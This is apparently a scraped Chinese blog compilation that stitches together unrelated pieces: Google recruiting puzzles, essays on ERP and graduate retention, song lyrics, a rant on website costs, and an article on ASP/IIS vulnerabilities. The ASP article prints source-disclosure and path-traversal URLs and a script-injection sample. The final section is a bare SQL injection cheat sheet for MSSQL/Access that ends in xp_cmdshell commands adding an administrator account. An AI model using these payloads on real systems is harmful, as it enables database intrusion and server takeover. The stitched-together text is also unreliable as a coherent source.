tymg

　　Google上一轮招聘，今年夏天刚结束。

　　用的也是一道“科学麻瓜”看不懂的“整蛊题”，而且，堂而皇之挂在硅谷各大地铁站上。9月底，3块15米长的米色广告牌上，简简单单刷着“（在‘e’的数列中所能找到的第一个十位数质数）.com”，没有公司名也没有任何广告词。

　　花了几秒钟，路人才明白，这是一道数学题。自然常数e（2.718281828……）的第一个十位数质数，是目标网站的名字。

　　好奇分子忍不住用Google搜索起答案来，压根儿不晓得这就是Google出的“硬骨头”考题。

　　不少人后来在规定时间内，登录上了www.7427466391.com。然而，那不是梦寐以求的终点站，Google恶作剧似的，为“高手”们在半山腰设了个休息的小凉亭。

　　www.7427466391.com里，贴出一条更令人头疼的数学问题，答出这个问题，能得到进入下一个网页的密码。

　　跑完数学“马拉松”，7500个“幸存者”走入Google实验室网页，成功投出简历。最后，Google只要了50个人。“光以广告而论，Google也算得上高段！”

　　波士顿一家广告公司的高级副总裁弗里茨·库恩分析，“目标人群看到广告后会想，‘这是我的语言，那是冲着我来的’；对其他人而言，广告也使Google的形象大大提升。他们可能会想，‘我是得不到这份工作的了。不过，在那儿工作的人真聪明’。”

　　Google测试考的就是脑筋

　　·试着证明WWWDOT-GOOGLE=DOTCOM·用俳句（一种日本短诗，每句有一个与季节有关的词）来描述各种模型，借此预测网络搜索流量的季节性变化。

　　·你落入一个迷宫，回旋不断的走廊。手里有一台堆满灰尘的手提电脑，可以无线上网。周围，许多无生命的侏儒徘徊走动。这种情况下，你会如何做？

　　A)无目的地徘徊，不停走入死胡同，然后被迷宫里面的妖怪吃掉。

　　B)用手提电脑当铲子，打穿地板直接进入游戏下一关。

　　C)玩网络游戏《魔法奇兵》，直到电池耗尽。

　　D)利用计算机，找到迷宫的节点，发现准确出路。

　　E)把你的简历寄给Google，告诉迷宫里领头的妖怪，你要退出游戏。然后，发现你回到了现实世界。

　　·Unix有什么问题？你会如何补救它？

　　·你在Google工作的第一天，发现你同寝室的室友，曾写过一本书。你研究生一年级时，这本书是你最重要的参考资料。你会：A)求他帮你签个名。B)不改坐姿，却放轻打字声音，尽量避免影响他。

　　C)把你每天吃的麦片和咖啡，留给他吃。

　　D)引用他那本书中间，你最喜欢的程式，告诉他这则方程给了你多少启发。

　　E)让他看看，你可以用不到34句语句，完成一个高难度程序。

　　·以下哪个最好地表达了Google的企业文化？

　　A)“我感觉挺幸运”

　　B)“别干坏事”

　　C)“哦，我已经完成了任务”

　　D)“你身边10米以内，必定能找到食物”

　　E)以上皆是·用1欧姆的电阻，组成无限大的放行点阵，问“象棋跳马步”（“日”字对角点）两点之间的电阻是多少？

　　·下午2点，旧金山著名的湾区。你可以选择去阳光海岸、国家公园的红杉林里徒步旅行，或者参观城市
里的文化景观。你会怎么做？

　　·搜索技术的下一个革命性突破是什么？

　　·一个技术研究小组的最优化人员组合是几个人？一旦超过这个数字，每增加一个研究员，平均生产力就会相应下降：A)1B)3C)5D)11E)24·三角形ABC，用圆规和尺，找出点P，保证三角形ABP、ACP和BCP周长相等。

　　·你写过最酷的程序是什么？

　　·找出此数列的下一个:10,9,60,90,70,66?A)96B)10的100次方C)A或者BD)以上皆否·用少于29个词，描述你能带给Google实验室的贡献。

    从文化的角度看看如何实施ERP，谈论的只能是些很虚的概念。然而，正是这些虚无的概念才能给我正确的指引－－如何去制定一份真正切实可行的ERP实施方法，在合适的节奏下，企业上下用同样的步伐前进。

    说到ERP，就不能不提提杀遍中国市场无敌手的R/3。然而在疯狂宣传的背后，大量的失败案例让人触目惊心。早年的ERP无用论时常被人提起，但，更多的企业前仆后继。是什么原因？

    公正的说，源自西方管理理念的ERP系统并非没有其存在的必要性。管理的思想是相通的，但国外实施ERP的方法在中国却因为文化的问题而导致水土不服。

    中国人文化的核心是什么？是“神”，讲究精神上的一致，而忽略形。应对在现实生活中便是“马虎”“随意”。这样“中庸”的管理文化使得中国人没有严谨的工作作风。在实际的工作中，每个企业都会有自己若干不能逾越的“规矩”，在这些“规矩”的制约下，每个人都在马马虎虎做着自己该做的事情，更多的时候依靠“人情”去管理，而不是制度。

    而ERP强调的是什么？在西方“原罪论”的影响下，西方人不相信“人”，只相信实实在在的数据――一便是一，二便是二。在适当的节奏指引下，所有的人用一个拍子走路。这便是西方人的规矩。

    一个有意思的现象：同样受儒家文化引导的日本、台湾企业却能把ERP推动的有声有色，为什么大陆人做不到？

    研究过日本文化的人大多能发现这样一个现象：日本人对企业的归宿感极其强烈，同样的一个人，能尽可能的为企业服务――因为企业就是他们终身的家。而同样的企业也会给他们庇护。这样相互依存。正如当年推行JIT的日本企业，他们强调的是“人”的主动性。机器做不到的事情由人来弥补，最大限度的发挥“人”的作用。这也使得每个日本企业都会有自己一套独立的运作体系。所以大部分日本企业买的是“开发灵活的半成品ERP”。

    而吸收了日本、西方文化的台湾企业又另有不同：一方面企业希望员工对企业有忠诚，另一方面企业又对员工不放心，这就使得：企业在管理上不得不依靠各种“制度”。但凡接触过在大陆台资企业的人都会发现这样一些特点：台湾人喜欢签字，一种几近无聊的管理方法。台资企业更喜欢罚款，密密麻麻的规矩中只有星星点点的奖励措施作为点缀――更多的是连点缀都没有。台资企业还喜欢“圈养”，一个人的工资两个人拿，一个人的活两个人干――极其残酷的剥削，因为大陆有的是廉价劳动力。

    而延伸到ERP的管理，台湾软件的各种审批流程是极其严格的。只要软件能监控到这些“审核点”，就能满足企业的需要――对于大型的台资企业，因为其管理的特殊性，所以更倾向于使用ORACLE这样能灵活开发的产品。而对于中小企业，他们更倾向于选择“X新”这样死板的系统。员工只要在规定的时间在规定的画面录入规定的数据就能保证系统的顺利进行，而经理们只要在适当的时候“审核”单据即可。

    实施方法的差异

    在我看来：中国人，或者更明确的说是大陆人，太有“个性”。任何管理上的东西大多只能学到些皮毛。却又沾沾自喜的认为自己得到了精华。正如很多ERP顾问所抱怨的：客户连基础数据都做不准，又如何谈论ERP的顺利实施？整天都是无聊的会议，却始终不能解决任何问题，执行力的匮乏使得项目的推动陷入泥潭。同样的也如客户所抱怨的：顾问们对产品只知道个皮毛，而国内的ERP产品软件功能匮乏，而顾问们满嘴的“管理思想”却连企业的基本运作都不了解，更有顾问连自己的产品都不熟悉，却来号称“资深”――被人笑话。

    什么样的实施方法适合大陆的企业？

    大陆企业缺乏的是什么？当我们冷静的去思考这个问题时，我相信很多人都能有这样的共识：缺乏规矩。大陆企业有“规矩”没规矩。所以我提到的实施方法论也绝非什么“新奇”的概念，而只能是些实际操作的方法：如何规范企业的运作。

39的天空（http://blog.itpub.net/post/24/39953）

　　应届大学生是企业新员工中的一个特殊群体。如今，中小企业到岗才几个月的大学生纷纷“跳槽”的现象越来越普遍.对于这种现象，社会上也产生了不小的争议。一种观点认为大学生的这种行为是“极不负责任”“极不守诚信”的，学校和社会应该加强大学生的诚信教育；另一种观点却反驳到：这是社会进步的表现，不能把责任单方面地推给大学生。姑且不论谁是谁非，从企业的角度来说，花费了一定的人力、物力、财力，辛辛苦苦招来补充空缺岗位的大学生突然就离开了公司，不仅会加大企业不必要的成本，更严重的还可能打乱企业的某项商业计划，甚至导致计划的最终失败。这常常令一些中小企业的领导头疼不已，同时也十分的不解：当初面试时信誓旦旦地说喜欢这个岗位，愿意到公司来工作，如今却毫不留情，说走就走。 
    对于大学生的跳槽现象，总的来说，主要有以下几个方面的原因： 
    第一、对“先就业再择业”的错误理解。先就业再择业，是在毕业时无法找到自己满意的工作，先找一份工作，寄希望于积累工作经验和等自我价值得到较大的提升后，再找一份理想的工作。这是在高等教育由“精英型”向“大众型”转变，大学毕业生的供过于求，就业难难以根本改善时的就业举措。然而，一些大学生却曲解了这个意思，没有考虑到它的前提是：积累一定的工作经后，就匆匆跳槽； 
    第二、盲目攀比心理作祟的后果。有些大学生找工作时，看到其他的同学开始签约，就开始为自己着急，匆匆地找份自己并不满意的工作，到单位没多久就开始后悔当初的草率行为； 
   第三、对现有待遇的不满。这种不满主要来自公司和社会：一是公司可能没有实现当初所承诺的待遇，二是认为工资太低，考虑到既要回报父母，又要为今后打算，特别是房子问题，现有工资难以实现。所以选择跳槽，期望更高一点工资的工作； 
   第四、认为所从事的工作太单调乏味。大学生就业前一般会把工作想成是一件很富激情和挑战的事情，这符合年轻人的性格。但是工作后却往往大失所望，天天机械地重复，找不到当初的想象中的那种感觉，久而久之，产生厌倦，希望通过跳槽去追寻当初的美妙感觉。 
   第五、认为自己的发展前景暗淡。大学生就业时或多或少地存在心高气傲、急于求成的心理，相信今后可以施展才华，脱颖而出，对自己前途一片光明充满信心，。但是工作后才发现离憧憬还好远，盲目地怪罪于现有工作； 
   第六、企业缺乏活力，企业文化氛围不浓。企业上下死气成成，人浮于事，缺乏进取向上的精神，这也导致大学生选择跳槽； 
   其它的原因还有不适应当地的环境气候，工作强度大而难以或无法胜任，通过跳槽达到和异性朋友在同一个地方工作的目的等等。 
   以上的原因直接或间接地导致大学应届毕业生往往把第一份工作作为跳板。那么在分析他们跳槽的原因后，作为中小企业应该怎样做才能留住大学生，减少企业的成本和风险呢？ 
   1、企业要正确地评估企业的现有实力和环境。企业要招募大学生首要的工作是正确的认识自己。作为中小企业，在吸引大学生、薪资待遇等方面肯定不能和大企业相比。因此，中小企业在招聘时应该如实地向求职的大学生介绍本企业的相关情况和待遇状况，而不能欺骗、夸大或模糊，以免日后“搬起石头砸自己的脚”。企业要知道，企业有大小，大学生也有“高低档次”之分，一定有大学生会心甘情愿地去选择本类型的企业，他们迫切希望在签约之前得到关于企业的相关信息。企业招聘过程中的通过欺骗、夸大或模糊，以此来吸引优秀大学生，这种结果只会对自己的不利； 
   2、提供具有挑战性的工作。何谓挑战性？就是指从事这项工作会富有激情。工作的热情在很大程度上源于工作本身的激情。大学生们在高校学习了四年，很想所学的知识能有用武之地，所以应该尽可能提供给他们一定程度上超出他们所学的工作，让他们在感到能力有所不足情况下去努力想办法提高，不断地去超越自己。挑战性的工作也符合大学生年轻人的性格和心理，但是企业要注意的一点是，对他们从事挑战时遇上的困难要加以鼓励和帮助； 
   3、企业要为大学生选择一个“好”的部门领导来带。好领导的标准是：行为举止稳重、综合能力强、思想活跃不保守、德高望重、气质非常，最好是“长辈”。之所以要为他们选择一个好的领导，主要基于以下三个方面：一是树立他们学习的榜样，以优秀的领导人格魅力潜移默化地让他们改掉年轻人身上的“恶习”，二是可以为大学生提供大学和工作两种环境的过渡，三是对长辈大学生普遍存在尊敬的心理，可以便于沟通； 
   4、把情感留心放在重要的位置。只有留住其心才能留住其人。大学生初次进入社会，渴望得到社会的尊敬和认可。作为领导要关心大学生的工作、生活、思想，定期举行座谈会，和他们交流情感，了解他们是否适应这里的一切，想办法为他们提供良好的工作和生活环境。多问多观察多关注，让他们体会到企业领导对他们的重视，让他们知道他们对企业的重要性。同时，企业要加强各项制度建设，提供公开公平公正的竞争环境，注重企业文化朝着最优秀的方向发展，使大学生看到良好的发展机会； 
   5、不能忽视待遇留人。作为企业，应该有自己完善健全的薪酬体系，薪酬待遇要与职位相匹配，要与本行业平均水平相一致，要具有竞争力，真正体现出公平。待遇太低、不公平是留不住大学生的。例如在学历上就应该划开档次。有些企业大专与本科生的薪酬待遇相同，他们认为：你本科生应该把你学历高的优势发挥在工作上，去挣得其它的奖励。其实这是一种不公平的错误做法，会让本科生产生白学一年的抱怨，严重的会挫伤他们的积极性。此外，企业还应建立客观公正的绩效考核体系，推行竞争上岗，优胜劣汰，奖惩分明，充分挖掘员工潜能，培养员工综合能力； 
   6、向大学生提供阶段性的工作轮换。工作轮换的目的不是要改变他们的工作，而是通过在不同专业领域中进行轮换（比如从财务部门到生产管理部门再到人力资源部门等），大学生可以获得一个评价自己能力和爱好的良好机会，使他去更热爱自己本份工作，不会产生单调的感觉。多数大学生很希望阶段性的工作轮换，因为他们希望尝试新的东西来证明自己的能力。同时，企业也可以得到一位对企业事务具有更宽的视野和能力的未来管理者。所以企业很有必要这样去做； 
   7、定期为大学生提供培训的机会。刚毕业的大学生心存高远，期望通过培训来充电，提高自己以后竞争的砝码。培训提高了他们的专业技能，也就提高了企业整体的水平，是一种回利很大的投资。 
    留住大学生是中小企业一项系统、全面性的工作，需要企业各个职能部门上下齐心一致的努力。中小企業应该发挥自己特有的优势，去做好“筑巢引凤”“筑巢留凤”

http://www.0769.net.cn/news/shownews.asp?newsid=1818  0769东莞网站

有时候我觉得自己永远都吃不饱
也许只有吃的很多才能够长高
盼望能有一张迷人的相貌把所有人都迷倒
最后发现只有一种方法使用蒙汗药
长大之后无奈进入了社会我总是睡不着
我怀疑公司给别人的工资都比我高
总是努力学着对别人微笑难免也中他们圈套
偶尔上帝也会对我说失败很重要
我是一只只只~~~小鸟
因为吃的太多已经飞飞不高
我寻觅一颗栖息的树已被我压折了
这样的重量算不算太高
我是一只只只~~~小鸟
突然一天醒来有了迷人的美貌
麻雀也能飞上青天谁的歌声真美妙
美女的要求也不算太高

http://mms.blog.xuite.net/d7/5c/13015922/blog_48126/dv/3629250/3629250.mp3

　　Microsoft Active Server Pages（ASP）是服务器端脚本编写环境，使用它可以创建和运行动态、交互的 Web 服务器应用程序。使用 ASP 可以组合 HTML 页 、脚本命令和 ActiveX 组件以创建交互的 Web 页和基于 Web 的功能强大的应用程序。
现在很多网站特别是电子商务方面的网站，在前台上大都用ASP来实现。以至于现在ASP在网站应用上很普遍。
ASP是开发网站应用的快速工具，但是有些网站管理员只看到ASP的快速开发能力，却忽视了ASP安全问题。ASP从一开始就一直受到众多漏洞，后门的困扰，包括%81的噩梦，密码验证问题，IIS漏洞等等都一直使ASP网站开发人员心惊胆跳。
本文试图从开放了ASP服务的操作系统漏洞和ASP程序本身漏洞，阐述ASP安全问题，并给出解决方法或者建议。

　　ASP工作机理

　　Active Server Page技术为应用开发商提供了基于脚本的直观、快速、高效的应用开发手段，极大地提高了开发的效果。在讨论ASP的安全性问题之前，让我们来看看ASP是怎么工作的。ASP脚本是采用明文（plain text）方式来编写的。

　　ASP脚本是一系列按特定语法（目前支持vbscript和jscript两种脚本语言）编写的，与标准HTML页面混合在一起的脚本所构成的文本格式的文件。当客户端的最终用户用WEB浏览器通过INTERNET来访问基于ASP脚本的应用时，WEB浏览器将向WEB服务器发出HTTP请求。WEB服务器分析、判断出该请求是ASP脚本的应用后，自动通过ISAPI接口调用ASP脚本的解释运行引擎（ASP.DLL）。ASP.DLL将从文件系统或内部缓冲区获取指定的ASP脚本文件，接着就进行语法分析并解释执行。最终的处理结果将形成HTML格式的内容，通过WEB服务器"原路"返回给WEB浏览器，由WEB浏览器在客户端形成最终的结果呈现。这样就完成了一次完整的ASP脚本调用。若干个有机的ASP脚本调用就组成了一个完整的ASP脚本应用。
让我们来看看运行ASP所需的环境：
Microsoft Internet Information Server 3.0/4.0/5.0 on NT Server
Microsoft Internet Information Server 3.0/4.0/5.0 on Win2000
Microsoft Personal Web Server on Windows 95/98
WINDOWS NT Option Pack所带的Microsoft IIS提供了强大的功能，但是IIS在网络安全方面却是比较危险的。因为很少有人会用Windows 95/98当服务器，因此本文我更多的从NT中的IIS安全问题来探讨。

　　
微软自称的ASP的安全优点

　　虽然我们本文的重点是探讨ASP漏洞和后门，但是有必要谈谈ASP在网络安全方面的"优点"，之所以加个""，是因为有时这些微软宣称的"优点"恰恰是其安全隐犯。微软称ASP在网络安全方面一大优点就是用户不能看到ASP的源程序，
从ASP的原理上看，ASP在服务端执行并解释成标准的HTML语句，再传送给客户端浏览器。"屏蔽"源程序能很好的维护ASP开发人员的版权，试想你辛辛苦苦做了一个很优秀的程序，给人任意COPY，你会怎么想？而且黑客还能分析你的ASP程序，挑出漏洞。更重要的是有些ASP开发者喜欢把密码，有特权的用户名和路径直接写在程序中，这样别人通过猜密码，猜路径，很容易找到攻击系统的"入口"。但是目前已经发现了很多能查看ASP源程序的漏洞，后面我们还要讨论。
IIS支持虚拟目录，通过在"服务器属性"对话框中的"目录"标签可以管理虚拟目录。建立虚拟目录对于管理WEB站点具有非常重要的意义。虚拟目录隐藏了有关站点目录结构的重要信息。因为在浏览器中，客户通过选择"查看源代码"，很容易就能获取页面的文件路径信息，如果在WEB页中使用物理路径，将暴露有关站点目录的重要信息，这容易导致系统受到攻击。其次，只要两台机器具有相同的虚拟目录，你就可以在不对页面代码做任何改动的情况下，将WEB页面从一台机器上移到另一台机器。还有就是，当你将WEB页面放置于虚拟目录下后，你可以对目录设置不同的属性，如：Read、Excute、Script。读访问表示将目录内容从IIS传递到浏览器。而执行访问则可以使在该目录内执行可执行的文件。当你需要使用ASP时，就必须将你存放.asp文件的目录设置为"Excute（执行）"。建议大家在设置WEB站点时，将HTML文件同ASP文件分开放置在不同的目录下，然后将HTML子目录设置为"读"，将ASP子目录设置为"执行"，这不仅方便了对WEB的管理，而且最重要的提高了ASP程序的安全性，防止了程序内容被客户所访问。

　　
ASP漏洞分析和解决方法

　　有人说一台不和外面联系的电脑是最安全的电脑，一个关闭所有端口，不提供任何服务的电脑也是最安全的。黑客经常利用我们所开放的端口实施攻击，这些攻击最常见的是DDOS（拒绝服务攻击）.下面我会列出ASP的二十几个漏洞，每个漏洞都会有漏洞描述和解决方法。

　　1 在ASP程序后加个特殊符号，能看到ASP源程序

　　受影响的版本：
win95+pws
IIS3.0
98+pws4 不存在这个漏洞。
IIS4.0以上的版本也不存在这个漏洞。
问题描述：
这些特殊符号包括小数点，%81, ::
http://someurl/somepage.asp.
http:// someurl/somepage.asp%81
http:// someurl/somepage.asp::
http:// someurl/somepage.asp %2e
http:// someurl/somepage %2e%41sp
http:// someurl/somepage%2e%asp
http:// someurl/somepage.asp %2e
http://someurl/msadc/samples/selector/showcode.asp?source=/msadc/samples/../../../../../../boot.ini （可以看到boot.ini的文件内容）
那么在安装有IIS3.0和win95+PWS的浏览中就很容易看到somepage.asp的源程序。究竟是什么原因造成了这种可怕的漏洞呢？究其根源其实是 Windows NT 特有的文件系统在做怪。有一点常识的人都知道在 NT 提供了一种完全不同于 FAT 的文件系统：NTFS，这种被称之为新技术文件系统的技术使得 NT 具有了较高的安全机制，但也正是因为它而产生了不少令人头痛的隐患。大家可能不知道， NTFS 支持包含在一个文件中 的多数据流，而这个包含了所有内容的主数据流被称之为"DATA"，因此使得在浏览器 里直接访问 NTFS 系统的这个特性而轻易的捕获在文件中的脚本程序成为了可能。然而 直接导致 :: 的原因是由于 IIS 在解析文件名的时候出了问题，它没有很好地规范文件名。

　　解决方法和建议：

　　如果是Winodws NT用户，安装IIS4.0或者IIS5.0，Windows2000不存在这个问题。如果是win95用户，安装WIN98和PWS4.0。

　　2 ACCESS mdb 数据库有可能被下载的漏洞

　　问题描述：
在用ACCESS做后台数据库时，如果有人通过各种方法知道或者猜到了服务器的ACCESS数据库的路径和数据库名称，那么他能够下载这个ACCESS数据库文件，这是非常危险的。比如：如果你的ACCESS数据库book.mdb放在虚拟目录下的database目录下，那么有人在浏览器中打入：
http:// someurl/database/book.mdb
如果你的book.mdb数据库没有事先加密的话，那book.mdb中所有重要的数据都掌握在别人的手中。

　　解决方法：

　　(1) 为你的数据库文件名称起个复杂的非常规的名字，并把他放在几目录下。所谓"非常规"，打个比方：比如有个数据库要保存的是有关书籍的信息，可不要把他起个"book.mdb"的名字，起个怪怪的名称，比如d34ksfslf.mdb，再把他放在如./kdslf/i44/studi/ 的几层目录下，这样黑客要想通过猜的方式得到你的ACCESS数据库文件就难上加难了。

　　(2)不要把数据库名写在程序中。有些人喜欢把DSN写在程序中，比如：
DBPath = Server.MapPath("cmddb.mdb")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
假如万一给人拿到了源程序，你的ACCESS数据库的名字就一览无余。因此建议你在ODBC里设置数据源，再在程序中这样写：conn.open "shujiyuan"

　　(3)使用ACCESS来为数据库文件编码及加密。首先在选取"工具->安全->加密/解密数据库，选取数据库（如：employer.mdb），然后接确定，接着会出现"数据库加密后另存为"的窗口，存为：employer1.mdb。接着employer.mdb就会被编码，然后存为employer1.mdb..要注意的是，以上的动作并不是对数据库设置密码，而只是对数据库文件加以编码，目的是为了防止他人使用别的工具来查看数据库文件的内容。
接下来我们为数据库加密，首先以打开经过编码了的employer1.mdb，在打开时，选择"独占"方式。然后选取功能表的"工具->安全->设置数据库密码"，接着输入密码即可。为employer1.mdb设置密码之后，接下来如果再使用ACCEES数据库文件时，则ACCESS会先要求输入密码，验证正确后才能够启动数据库。不过要在ASP程序中的connection对象的open方法中增加PWD的参数即可，例如：
param="driver={Microsoft Access Driver (*.mdb)};Pwd=yfdsfs"
param=param&";dbq="&server.mappath("employer1.mdb")
conn.open param
这样即使他人得到了employer1.mdb文件，没有密码他是无法看到employer1.mdb的。

　　3 code.asp文件会泄漏ASP代码

　　问题描述：
举个很简单的例子，在微软提供的 ASP1.0 的例程里有一个 .asp 文件 ，专门用来查看其它 .asp 文件的源代码，该文件为 ASPSamp/Samples/code.asp。如果有人把这个程序上传到服务器，而服务器端没有任何防范措施的话，他就可以很容易地查看他人的程序。例如 :
　　code.asp?source=/directory/file.asp
不过这是个比较旧的漏洞了，相信现在很少会出现这种漏洞。
下面这命令是比较新的：
http://someurl/iissamples/exair/howitworks/code.asp?/lunwen/soushuo.asp=xxx.asp
最大的危害莫过于asa文件可以被上述方式读出；数据库密码以明文形式暴露在黑客眼前;

　　问题解决或建议：

　　对于IIS自带的show asp code的asp程序文件，删除该文件或者禁止访问该目录即可

　　4、filesystemobject 组件篡改下载 fat 分区上的任何文件的漏洞

　　问题描述：
　　IIS3、 IIS4 的 ASP 的文件操作都可以通过 filesystemobject 实现，包括文本文件的读写目录操作、文件的拷贝改名删除等，但是这个强大的功能也留下了非常危险的 "后门"。利用 filesystemobjet 可以篡改下载 fat 分区上的任何文件。即使是 ntfs 分区，如果权限没有设定好的话，同样也能破坏，一不小心你就可能遭受"灭顶之灾 "。遗憾的是很多 webmaster 只知道让 web 服务器运行起来，很少对 ntfs 进行权限 设置，而 NT 目录权限的默认设置偏偏安全性又低得可怕。因此，如果你是 Webmaster ，建议你密切关注服务器的设置，尽量将 web 目录建在 ntfs 分区上，目录不要设定 everyone full control，即使是是管理员组的成员一般也没什么必要 full control，只要有读取、更改权限就足够了。 也可以把filesystemobject的组件删除或者改名。

　　5、输入标准的HTML语句或者javascript语句会改变输出结果

　　问题描述：
　 在输入框中打入标准的HTML语句会得到什么相的结果呢？
比如一个留言本，我们留言内容中打入：
<font size=10>你好！</font>
　 如果你的ASP程序中没有屏蔽html语句，那么就会改变"你好"字体的大小。在留言本中改变字体大小和贴图有时并不是什么坏事，反而可以使留言本生动。但是如果在输入框中写个 javascript 的死循环，比如：<a herf="http://someurl" onMouseover="while(1){window.close('/')}">特大新闻</a>
那么其他查看该留言的客人只要移动鼠标到"特大新闻"，上就会使用户的浏览器因死循环而死掉。

　　解决方法和建议：

　　编写类似程序时应该做好对此类操作的防范，譬如可以写一段程序判断客户端的输入，并屏蔽掉所有的 HTML、 Javascrip

原文来自中国站长站论坛

大型娱乐站、旅游站、咨询站、门户站，中国某某第一站？？？？

你知道你上面说的这几个字，如何能实现嘛？
我来告诉你，
1年广告费用（价格都是2004年的）

首先，
SINA 一天的首页 LOGO图片价格：15000/天
SOHU 一天的首页 LOGO图片价格：15000/天
163 一天的首页 LOGO图片价格：18000/天

SINA 一天的首页 通栏价格：16万/天
SOHU 一天的首页 通栏价格：15.2万/天
163 一天的首页 通栏价格：15.4万/天

SINA 首页 弹出页面价格：10万/小时
SOHU 首页 弹出页面价格：12万/小时
163 首页 弹出页面价格：11.5万/小时

SINA 首页 弹出窗口价格：13万/天
SOHU 首页 弹出窗口价格：14万/天
163 首页 弹出窗口价格：13万/天

SINA 所有用户邮件价格：12万/天
SOHU 所有用户邮件价格：10万/天
163 所有用户邮件价格：15万/天

这只是广告费用，

其次，你在机房的投资，

DELL 主服务器系统 40万/台（全套）
IBM 主服务器系统 48万/台（全套）
HP 没有主服务器系统

你至少不上3台？1台网站，1台论坛，1台邮件

然后是人工，
现在网络雇员的费用应该是

北京 高级管理人员 10-20万/月
一般管理人员 1-5万/月
技术骨干 50-200万/年
一般技术 2000-5万/月
普通维护 1000-8000/月
普通雇员 600-2000月

上海 高级管理人员 20-40万/月
一般管理人员 5万/月
技术骨干 80-200万/年
一般技术 5000-5万/月
普通维护 3000-1万/月
普通雇员 1000-4000月

本站注：这上面的数据确实有点夸张。补充如下：
外企高管（除了地区总裁亚太经理，港澳台胞）也就20－100万/年
一般技术 2000-1万/月比较多，通信行业多些，2万/月
技术骨干 5000-20000/月是很正常的，多了就该被开了

而你的所谓门户，至少需要
5个高级管理 财务/网络/技术/人事/客户
5-10个技术骨干
20个技术
20个普通维护
普通雇员建议不超过20

然后，计算得出你一年的投资成本为：500万-8000万RMB

计算你的赢利项目:

0.门户站？汗，不说你们也知道，
1.旅游，你的本地有支柱实物产业嘛？比如酒店，宾馆，旅行社？
2.信息广场？你们本地的信息港和人才市场的访问量是多少，剩下多少给你？
3.网站建设？？这个要是能赚钱，那就奇怪了，任何搞网站的都知道，没有内部的人，没有关系，没有政府大企业的长期合同，搞网站建设不死也赚不了多少。
4.礼品？网上商店？ 你知道现在有多少家吗？你打算推出什么特色来吸引客户？taobao?ebay?云网？等等大的卖家，都已经吃掉中国的9成市场了。
5.网址站？你知道中国有多少网址站嘛？我不敢说自己能统计清楚，因为我根本就统计不出来数字，因为太多了，自己建立一个，当网站书签还可以。
6.搜索站？技术在那里？全都是偷盗的，有什么意思？
7.黄|色站？你简直不知道国外空间什么叫做黑？总之就是，钱给了，空间没有，或者是用不了多久，要不就是限制的很死，老是超过流量。就算你都没碰见，你以为搞黄站，就真的能赚多少钱？还有，安全？有的钱，有命花才可以啊，可别让国内CT抓到，否则.....
8.短信站？你以为中国还有多少个傻子？？？
9.广告联盟站？搞这个的，估计都把站长当做白痴了，你见过几个大站的个人网站，加入联盟的？
10.游戏站？一个17173还不够，你们到底分析过17173的流量是为什么吗？那我告诉你，因为游戏新闻和攻略，可是你们的实力，能做到先17173更新吗？
10-1.游戏外挂私服？这个偶没什么说的，用游戏就有外挂，看的远点的说，游戏公司甘心被你们这样搞吗？等国家游戏政策明了化，第一个倒霉的就是外挂站，然后就是私服.何况，这个赢利点也太小了，自己技术做不出外挂，做私服服务器贵，只是介绍等等，够难的，赢利回本难。
11.博客？除非你真的有点文学功底，还有一群这样的朋友帮你，要不，没有特色，原创，也是完.
12.下载站。别老是偷，这样是没前途的，看看人家天空为什么发展起来，最简单的道理，所有东西都是自己的，保证能下载，而且没什么太多广告烦人，不用注册，不用点广告才能下载
13.大大小小的论坛站，建议没有特色就不要开论坛，否则，半年你就知道什么叫做惨淡经营了，看着自己论坛上空空的，就知道痛苦了
14.其他的大大小小的，不是很多同类型的网站？能有几个真的混出来的，能站出来说我的站能养活我，养活我的网站。估计中国10成的网站里面，连0.1成都不到吧。

当然不能否定的是：
如果你的广告能有预期的那么好，
访问能有预期的那么好，
产品卖的能有预期的那么好，

也就是说，你有大概3-20年的时间收回成本。

完了，个人看法，砖可以仍，

只是觉得你们这样，随便建一个网站，打上点东西，
就叫
什么什么全球
什么什么亚洲
什么什么中国
什么什么唯一
什么什么门户
什么什么独创

的普通网站，不能放眼在实际情况，
整和现在的网络气息，
找到自己的突破口，

盲目的复制性
HAO123

盲目的偷盗性
新闻小偷

盲目的重合性
是个论坛就有情感和灌水区

现在，是不可能建立一个网站，就赚钱的
因为中国

只有一个 hao123 只有一个 17173
而他们，一个被收购，一个被并购
只有一个易趣，也只有一个taobao
而他们，一个烧钱过亿，一个苦苦挣扎
一个SOHU和一个163
而他们，一个靠名气，一个靠游戏
一个SINA和一个TOM
而他们，一个是日本投资文化侵略(本站注：此说法有误)，一个是色|情新闻起家

要做，就要做别人没有的，和别人做的一样，
在网络上，你能分到多少流量？

只是告诉大家，做网站，要理智，
首先，你要爱一行，才能精通一行，不能是说赚钱，
就来干，
为了赚钱而赚钱的网站，有多少网民会信任经常来你的站呢？

需求决定供给，给网民真实的需要，
他们才能拥护你的网站，

当有一天，你真能做到大站的时候，
那种网民对你网站的认可，
才是一种最大的 “赢利”
是最值得 做网站的 去争取的，而为之努力的

网络最大的赢家是谁？
网通和电信!!!!!!!!!!!!!!

1.判断是否有注入
;and 1=1
;and 1=2

2.初步判断是否是mssql
;and user>0

3.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

4.注入参数是字符
'and [查询条件] and ''='

5.搜索时没过滤参数的
'and [查询条件] and '%25'='

6.猜数据库
;and (Select Count(*) from [数据库名])>0

7.猜字段
;and (Select Count(字段名) from 数据库名)>0

8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值（access）
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值（mssql）
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构（mssql）
;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(SELECT IS_MEMBER('db_owner'));--

11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--

